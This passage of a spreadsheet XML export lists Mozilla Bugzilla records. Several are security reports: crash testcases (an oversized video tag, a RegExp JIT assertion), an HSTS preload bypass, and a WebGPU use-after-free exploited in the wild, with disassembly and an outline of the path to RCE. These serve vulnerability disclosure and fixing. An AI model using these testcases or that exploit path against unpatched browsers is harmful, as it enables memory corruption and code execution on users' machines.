      <c r="F4994" t="n">
        <v>1</v>
      </c>
      <c r="G4994" t="n">
        <v>3</v>
      </c>
      <c r="H4994" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4994" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4994" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K4994" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4994" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4994" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4994" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4994" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4994" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q4994" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4994" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4994" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T4994" t="n">
        <v>1</v>
      </c>
      <c r="U4994" t="n">
        <v>0</v>
      </c>
      <c r="V4994" t="n">
        <v>18</v>
      </c>
      <c r="W4994" t="inlineStr">
        <is>
          <t>Created attachment 573399
example website
when visiting the website:
&lt;video width="999999999" height="999999999" controls autoplay&gt;
&lt;source src="avideo.ogg" type="video/ogg"&gt;
&lt;/video&gt;&lt;video controls autoplay&gt;
firefox crashes in LinearScaleYUVToRGB32Row, an inline assembly function defined in gfx/ycbcr/yuv_row_posix.cpp
it looks like firefox is writing xmm1 to rgb_buf width times but width is too big so it writes xmm1 until it reaches unmapped memory and crashes then
I tested in firefox 5 on 32-bit linux and firefox 11 on 64-bit linux and it crashes as described above. I also tested in firefox 3.6 and it doesn't crash
marking as security because possibly exploitable memory corruption</t>
        </is>
      </c>
      <c r="X4994" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4995">
      <c r="A4995" t="n">
        <v>1564481</v>
      </c>
      <c r="B4995" t="inlineStr">
        <is>
          <t>2019-07-09 09:07:58 -0700</t>
        </is>
      </c>
      <c r="C4995" t="inlineStr">
        <is>
          <t>"Forget This Site" can override HSTS Preload List</t>
        </is>
      </c>
      <c r="D4995" t="inlineStr">
        <is>
          <t>2020-06-05 00:22:19 -0700</t>
        </is>
      </c>
      <c r="E4995" t="n">
        <v>1</v>
      </c>
      <c r="F4995" t="n">
        <v>1</v>
      </c>
      <c r="G4995" t="n">
        <v>3</v>
      </c>
      <c r="H4995" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4995" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4995" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K4995" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L4995" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4995" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4995" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4995" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4995" t="inlineStr">
        <is>
          <t>[psm-assigned][post-critsmash-triage][adv-main69+][adv-esr68.1+]</t>
        </is>
      </c>
      <c r="Q4995" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4995" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4995" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T4995" t="n">
        <v>1</v>
      </c>
      <c r="U4995" t="n">
        <v>0</v>
      </c>
      <c r="V4995" t="n">
        <v>31</v>
      </c>
      <c r="W4995" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Steps to reproduce:
1. Opened a HSTS website (which was not in HSTS preload list) with Firefox 67
2. Get the domain included in HSTS preload list for Firefox 68
3. Upgrading to Firefox 68
4. Remove website from history ("Forget This Site")
5. Restart browser
6. Open http:// connection to the website
Actual results:
 Connection is over http (unencrypted)
SiteSecurityServiceState.txt before step 4:
henlich.de:HSTS	1	18086	1594223236082,1,1,2
SiteSecurityServiceState.txt after step 5:
henlich.de:HSTS	1	18086	0,2,0,0
Expected results:
Connection should be upgraded to https, because domain is on HSTS preload list</t>
        </is>
      </c>
      <c r="X4995" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4996">
      <c r="A4996" t="n">
        <v>1758070</v>
      </c>
      <c r="B4996" t="inlineStr">
        <is>
          <t>2022-03-04 00:05:30 -0800</t>
        </is>
      </c>
      <c r="C4996" t="inlineStr">
        <is>
          <t>UAF in Webgpu status manager [exploited in the wild]</t>
        </is>
      </c>
      <c r="D4996" t="inlineStr">
        <is>
          <t>2024-05-30 10:54:30 -0700</t>
        </is>
      </c>
      <c r="E4996" t="n">
        <v>1</v>
      </c>
      <c r="F4996" t="n">
        <v>1</v>
      </c>
      <c r="G4996" t="n">
        <v>3</v>
      </c>
      <c r="H4996" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4996" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4996" t="inlineStr">
        <is>
          <t>Graphics: WebGPU</t>
        </is>
      </c>
      <c r="K4996" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4996" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4996" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4996" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4996" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4996" t="inlineStr">
        <is>
          <t>[adv-main97.0.2+]{adv-esr91.6.1+][reporter-external] [client-bounty-form] [verif?][sec-survey]</t>
        </is>
      </c>
      <c r="Q4996" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4996" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4996" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4996" t="n">
        <v>1</v>
      </c>
      <c r="U4996" t="n">
        <v>0</v>
      </c>
      <c r="V4996" t="n">
        <v>26</v>
      </c>
      <c r="W4996" t="inlineStr">
        <is>
          <t>#Summary
UAF in Webgpu status manager[exploited in the wild]
#Type
GPU process RCE
#NOTE
We have evidence that the following bug is being explot in the wild.
This problem has been fixed in the latest beta version, 
the reason for the fix is an accident(https://bugzilla.mozilla.org/show_bug.cgi?id=1746538),
but the stable version (97.0.1) has not been synchronized.
Therefore, we think it is necessary to report this vulnerability in detail, so that the stable version can be fixed as soon as possible,
and at the same time apply for a CVE number to track this vulnerability
#CREDIT
wang gang&amp;liu jialei&amp;du sihang&amp;huang yi&amp;yang kang of 360 ATA
#MINIPOC
```
mov     rax, [rsp+0E38h+var_DF8]
mov     qword ptr [rax+198h], 0
mov     rax, [rsp+0E38h+var_DF8]
add     rax, 198h
xor     edx, edx
mov     rcx, rax
call    [rsp+0E38h+mozilla::webgpu::Instance::Create]		&lt;&lt;[1]
mov     rax, [rsp+0E38h+var_DF8]
mov     rax, [rax+198h]
mov     rcx, [rax+20h]
call    [rsp+0E38h+mozilla::webgpu::PWebGPUChild::SendShutdown] &lt;&lt;[2]
mov     [rsp+0E38h+var_DEC], 0		
```
#RCA
1. Get Render side RCE,we already reported in https://bugzilla.mozilla.org/show_bug.cgi?id=1758062
2. Run shellcode in compromised Render process call mozilla::webgpu::Instance::Create then call mozilla::webgpu::PWebGPUChild::SendShutdown
to get a webgpu with wrong status.
3. After a clever heap layout call mozilla::webgpu::PWebGPUChild::SendShaderModuleDestroy get RCE
```
ipc::IPCResult WebGPUParent::RecvShutdown() {
  mTimer.Stop();
  for (const auto&amp; p : mCanvasMap) {
    const wr::ExternalImageId extId = {p.first};
    layers::TextureHost::DestroyRenderTexture(extId);
  }
  mCanvasMap.clear();
  ffi::wgpu_server_poll_all_devices(mContext, true);
  ffi::wgpu_server_delete(const_cast&lt;ffi::WGPUGlobal*&gt;(mContext));	&lt;&lt;
  return IPC_OK();
}
```</t>
        </is>
      </c>
      <c r="X4996" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4997">
      <c r="A4997" t="n">
        <v>1795139</v>
      </c>
      <c r="B4997" t="inlineStr">
        <is>
          <t>2022-10-13 13:12:31 -0700</t>
        </is>
      </c>
      <c r="C4997" t="inlineStr">
        <is>
          <t>Consider showing fullscreen notification as soon as browser window goes into fullscreen mode</t>
        </is>
      </c>
      <c r="D4997" t="inlineStr">
        <is>
          <t>2023-01-24 11:27:19 -0800</t>
        </is>
      </c>
      <c r="E4997" t="n">
        <v>1</v>
      </c>
      <c r="F4997" t="n">
        <v>1</v>
      </c>
      <c r="G4997" t="n">
        <v>3</v>
      </c>
      <c r="H4997" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4997" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4997" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4997" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4997" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4997" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4997" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4997" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4997" t="inlineStr">
        <is>
          <t>[adv-main108+][adv-esr102.7+]</t>
        </is>
      </c>
      <c r="Q4997" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4997" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4997" t="inlineStr">
        <is>
          <t>108 Branch</t>
        </is>
      </c>
      <c r="T4997" t="n">
        <v>1</v>
      </c>
      <c r="U4997" t="n">
        <v>0</v>
      </c>
      <c r="V4997" t="n">
        <v>12</v>
      </c>
      <c r="W4997" t="inlineStr">
        <is>
          <t>Currently the fullscreen notification is shown only when both browser window and web content goes into fullscreen mode which require several IPC message to exchanges the status.
But I think the notification is more about to notify the user that the browser window is going to switch to fullscreen mode (because the toolbar and urlbar will be hidden). We could consider showing the notification as soon as browser window goes into fullscreen mode, I would expect this could make notification shown faster.</t>
        </is>
      </c>
      <c r="X4997" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4998">
      <c r="A4998" t="n">
        <v>1194947</v>
      </c>
      <c r="B4998" t="inlineStr">
        <is>
          <t>2015-08-14 23:56:22 -0700</t>
        </is>
      </c>
      <c r="C4998" t="inlineStr">
        <is>
          <t>miscalculation in mp_exptmod()</t>
        </is>
      </c>
      <c r="D4998" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:21 -0700</t>
        </is>
      </c>
      <c r="E4998" t="n">
        <v>1</v>
      </c>
      <c r="F4998" t="n">
        <v>1</v>
      </c>
      <c r="G4998" t="n">
        <v>3</v>
      </c>
      <c r="H4998" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4998" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J4998" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K4998" t="inlineStr">
        <is>
          <t>3.19.2</t>
        </is>
      </c>
      <c r="L4998" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4998" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4998" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4998" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P4998" t="inlineStr"/>
      <c r="Q4998" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4998" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4998" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4998" t="n">
        <v>1</v>
      </c>
      <c r="U4998" t="n">
        <v>0</v>
      </c>
      <c r="V4998" t="n">
        <v>6</v>
      </c>
      <c r="W4998" t="inlineStr">
        <is>
          <t>Created attachment 8648348
sample code, compile with -I[path_to_mpi_includes] libmpi.a
mp_exptmod() will sometimes calculate wrong values.
Example:
(80^fc) mod 0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0EED0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F7C000000000000000000000000000000000000000000000000000000000000000000000000000000000000
I have attached a sample code showing that. Using first mp_expt and then mp_mod gives a different result than mp_exptmod. Should give the same result.
As this is basically the "RSA-function" this may have security implications (but not sure, needs some skilled cryptographer to investigate whether this is exploitable in any way).
(Found with afl by comparing openssl/nss results)</t>
        </is>
      </c>
      <c r="X4998" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4999">
      <c r="A4999" t="n">
        <v>1037960</v>
      </c>
      <c r="B4999" t="inlineStr">
        <is>
          <t>2014-07-13 05:24:36 -0700</t>
        </is>
      </c>
      <c r="C4999" t="inlineStr">
        <is>
          <t>Backfill Socorro matview for 2014-07-12</t>
        </is>
      </c>
      <c r="D4999" t="inlineStr">
        <is>
          <t>2014-07-13 09:42:14 -0700</t>
        </is>
      </c>
      <c r="E4999" t="n">
        <v>1</v>
      </c>
      <c r="F4999" t="n">
        <v>1</v>
      </c>
      <c r="G4999" t="n">
        <v>4</v>
      </c>
      <c r="H4999" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4999" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4999" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K4999" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4999" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4999" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4999" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4999" t="inlineStr"/>
      <c r="Q4999" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4999" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4999" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4999" t="n">
        <v>1</v>
      </c>
      <c r="U4999" t="n">
        <v>0</v>
      </c>
      <c r="V4999" t="n">
        <v>3</v>
      </c>
      <c r="W4999" t="inlineStr">
        <is>
          <t>As explained in bug 1037959, we failed to schedule matview jobs for today and therefore did not process the data for 2014-07-12 into matviews. As in bug 1024580, we'll need to run a backfill for that.
Given that we just released the last 31 beta on Friday and that has very significant crash fixes that we need to verify, this is rather urgent, I'll need that data tomorrow in the early European afternoon.</t>
        </is>
      </c>
      <c r="X4999" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5000">
      <c r="A5000" t="n">
        <v>1019684</v>
      </c>
      <c r="B5000" t="inlineStr">
        <is>
          <t>2014-06-03 08:40:37 -0700</t>
        </is>
      </c>
      <c r="C5000" t="inlineStr">
        <is>
          <t>Assertion failure: isInRange(offset), at jit/arm/Assembler-arm.h:989 or Crash [@ js::jit::Simulator::instructionDecode] with RegExp</t>
        </is>
      </c>
      <c r="D5000" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:00 -0700</t>
        </is>
      </c>
      <c r="E5000" t="n">
        <v>1</v>
      </c>
      <c r="F5000" t="n">
        <v>1</v>
      </c>
      <c r="G5000" t="n">
        <v>3</v>
      </c>
      <c r="H5000" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5000" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5000" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5000" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5000" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5000" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5000" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5000" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5000" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main31+][adv-esr24.7+]</t>
        </is>
      </c>
      <c r="Q5000" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5000" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5000" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T5000" t="n">
        <v>1</v>
      </c>
      <c r="U5000" t="n">
        <v>0</v>
      </c>
      <c r="V5000" t="n">
        <v>25</v>
      </c>
      <c r="W5000" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision f28005b84ed0 (run with --fuzzing-safe):
var SECTION = "expression-015";
var TITLE   = "Function Calls";
var N = 100 * 1000;
var a = new Array(N);
for (var i = 0; i != N; ++i) {
  a[i] = SECTION;
}
var str = a.join('|');
var re = new RegExp(str);
re.exec(N - 1);</t>
        </is>
      </c>
      <c r="X5000" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5001">
      <c r="A5001" t="n">
        <v>1476546</v>
      </c>
      <c r="B5001" t="inlineStr">
        <is>
          <t>2018-07-18 03:19:18 -0700</t>
        </is>
      </c>
      <c r="C5001" t="inlineStr">
        <is>
          <t>Convert lodash .isString() to native ES6 JS</t>
        </is>
      </c>
      <c r="D5001" t="inlineStr">
        <is>
          <t>2018-08-01 03:11:08 -0700</t>
        </is>
      </c>
      <c r="E5001" t="n">
        <v>1</v>
      </c>
      <c r="F5001" t="n">
        <v>1</v>
      </c>
      <c r="G5001" t="n">
        <v>7</v>
      </c>
      <c r="H5001" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5001" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5001" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K5001" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5001" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5001" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5001" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5001" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5001" t="inlineStr"/>
      <c r="Q5001" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5001" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5001" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5001" t="n">
        <v>1</v>
      </c>
      <c r="U5001" t="n">
        <v>0</v>
      </c>
      <c r="V5001" t="n">
        <v>4</v>
      </c>
      <c r="W5001" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36</t>
        </is>
      </c>
      <c r="X5001" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5002">
      <c r="A5002" t="n">
        <v>134225</v>
      </c>
      <c r="B5002" t="inlineStr">
        <is>
          <t>2002-03-29 10:09:43 -0800</t>
        </is>
      </c>
      <c r="C5002" t="inlineStr">
        <is>
          <t>Update milestone for Mozilla 1.0 release</t>
        </is>
      </c>
      <c r="D5002" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E5002" t="n">
        <v>1</v>
      </c>
      <c r="F5002" t="n">
        <v>1</v>
      </c>
      <c r="G5002" t="n">
        <v>2</v>
      </c>
      <c r="H5002" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5002" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5002" t="inlineStr">
        <is>
          <t>Build Config</t>
        </is>
      </c>
      <c r="K5002" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5002" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5002" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5002" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5002" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5002" t="inlineStr"/>
      <c r="Q5002" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5002" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5002" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T5002" t="n">
        <v>1</v>
      </c>
      <c r="U5002" t="n">
        <v>0</v>
      </c>
      <c r="V5002" t="n">
        <v>20</v>
      </c>
      <c r="W5002" t="inlineStr">
        <is>
          <t>Need two patches to update mozilla/config/milestone.txt
One is for the trunk (1.0.0+)
One is for MOZILLA_1_0_0_BRANCH (1.0.0)
*This bug must do after releasing Mozilla 1.0 RC1</t>
        </is>
      </c>
      <c r="X5002" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5003">
      <c r="A5003" t="n">
        <v>1336699</v>
      </c>
      <c r="B5003" t="inlineStr">
        <is>
          <t>2017-02-03 23:55:32 -0800</t>
        </is>
      </c>
      <c r="C5003" t="inlineStr">
        <is>
          <t>Uninitialized value in nsFtpState::R_pasv</t>
        </is>
      </c>
      <c r="D5003" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E5003" t="n">
        <v>1</v>
      </c>
      <c r="F5003" t="n">
        <v>1</v>
      </c>
      <c r="G5003" t="n">
        <v>6</v>
      </c>
      <c r="H5003" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5003" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5003" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K5003" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L5003" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5003" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5003" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5003" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5003" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][necko-active][adv-main52+][adv-esr45.8+]</t>
        </is>
      </c>
      <c r="Q5003" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5003" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5003" t="inlineStr">
        <is>
          <t>mozilla54</t>
        </is>
      </c>
      <c r="T5003" t="n">
        <v>1</v>
      </c>
      <c r="U5003" t="n">
        <v>0</v>
      </c>
      <c r="V5003" t="n">
        <v>18</v>
      </c>
      <c r="W5003" t="inlineStr">
        <is>
          <t>Created attachment 8833601
Server.cpp
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
1. Build Firefox with valgrind.
   I built with options and instructions  mentioned in
   https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Valgrind
2. Start firefox
   export VALGRIND_OPTIONS="--smc-check=all-non-file --vex-iropt-register-updates=allregs-at-mem-access --show-mismatched-frees=no --read-inline-info=yes"
   ./mach run --debugger="valgrind" --debugger-args="$VALGRIND_OPTIONS"
3. Download and compile Server.cpp on a Linux machine.
   g++ -w -o Server Server.cpp
4. Start the server on port 21.
   sudo ./Server
5. Visit ftp://127.0.0.1
Actual results:
Valgrind will display.
==28235== Conditional jump or move depends on uninitialised value(s)
==28235==    at 0xFECEB36: mozilla::net::nsSocketTransportService::CreateRoutedTransport(char const**, unsigned int, nsACString_internal const&amp;, int, nsACString_internal const&amp;, int, nsIProxyInfo*, nsISocketTransport**) (nsSocketTransportService2.cpp:741)
==28235==    by 0xFECEC85: mozilla::net::nsSocketTransportService::CreateTransport(char const**, unsigned int, nsACString_internal const&amp;, int, nsIProxyInfo*, nsISocketTransport**) (nsSocketTransportService2.cpp:713)
==28235==    by 0x101455F7: nsFtpState::R_pasv() [clone .part.108] [clone .constprop.145] (nsFtpConnectionThread.cpp:1501)
==28235==    by 0x1014EDC7: R_pasv (nsFtpConnectionThread.cpp:526)
==28235==    by 0x1014EDC7: nsFtpState::Process() (nsFtpConnectionThread.cpp:632)
==28235==    by 0x1014F422: nsFtpState::OnControlDataAvailable(char const*, unsigned int) (nsFtpConnectionThread.cpp:221)
==28235==    by 0x10142E17: nsFtpControlConnection::OnInputStreamReady(nsIAsyncInputStream*) (nsFtpControlConnection.cpp:61)
==28235==    by 0xFDF2333: nsInputStreamReadyEvent::Run() (nsStreamUtils.cpp:96)
...
Expected results:
Uninitialized value should not be used.</t>
        </is>
      </c>
      <c r="X5003" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5004">
      <c r="A5004" t="n">
        <v>637335</v>
      </c>
      <c r="B5004" t="inlineStr">
        <is>
          <t>2011-02-28 08:20:34 -0800</t>
        </is>
      </c>
      <c r="C5004" t="inlineStr">
        <is>
          <t>Jar files fail hash check on Win XP</t>
        </is>
      </c>
      <c r="D5004" t="inlineStr">
        <is>
          <t>2016-05-10 13:13:22 -0700</t>
        </is>
      </c>
      <c r="E5004" t="n">
        <v>1</v>
      </c>
      <c r="F5004" t="n">
        <v>1</v>
      </c>
      <c r="G5004" t="n">
        <v>6</v>
      </c>
      <c r="H5004" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5004" t="inlineStr">
        <is>
          <t>Mozilla Labs Graveyard</t>
        </is>
      </c>
      <c r="J5004" t="inlineStr">
        <is>
          <t>Test Pilot</t>
        </is>
      </c>
      <c r="K5004" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5004" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5004" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5004" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5004" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5004" t="inlineStr"/>
      <c r="Q5004" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5004" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5004" t="inlineStr">
        <is>
          <t>1.1</t>
        </is>
      </c>
      <c r="T5004" t="n">
        <v>1</v>
      </c>
      <c r="U5004" t="n">
        <v>0</v>
      </c>
      <c r="V5004" t="n">
        <v>11</v>
      </c>
      <c r="W5004" t="inlineStr">
        <is>
          <t>Seen with 1.1.pre5 on Fx4beta11
Feedback button is unresponsive, Also can't get any notifications to fire, not even Dummy Popup.</t>
        </is>
      </c>
      <c r="X5004" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5005">
      <c r="A5005" t="n">
        <v>1602392</v>
      </c>
      <c r="B5005" t="inlineStr">
        <is>
          <t>2019-12-09 02:51:31 -0800</t>
        </is>
      </c>
      <c r="C5005" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::MachineState::read] or Crash [@ js::jit::SnapshotIterator::allocationValue] with Debugger</t>
        </is>
      </c>
      <c r="D5005" t="inlineStr">
        <is>
          <t>2019-12-19 19:07:53 -0800</t>
        </is>
      </c>
      <c r="E5005" t="n">
        <v>1</v>
      </c>
      <c r="F5005" t="n">
        <v>1</v>
      </c>
      <c r="G5005" t="n">
        <v>3</v>
      </c>
      <c r="H5005" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5005" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5005" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5005" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5005" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5005" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5005" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5005" t="inlineStr">
        <is>
          <t>FIXED</t>
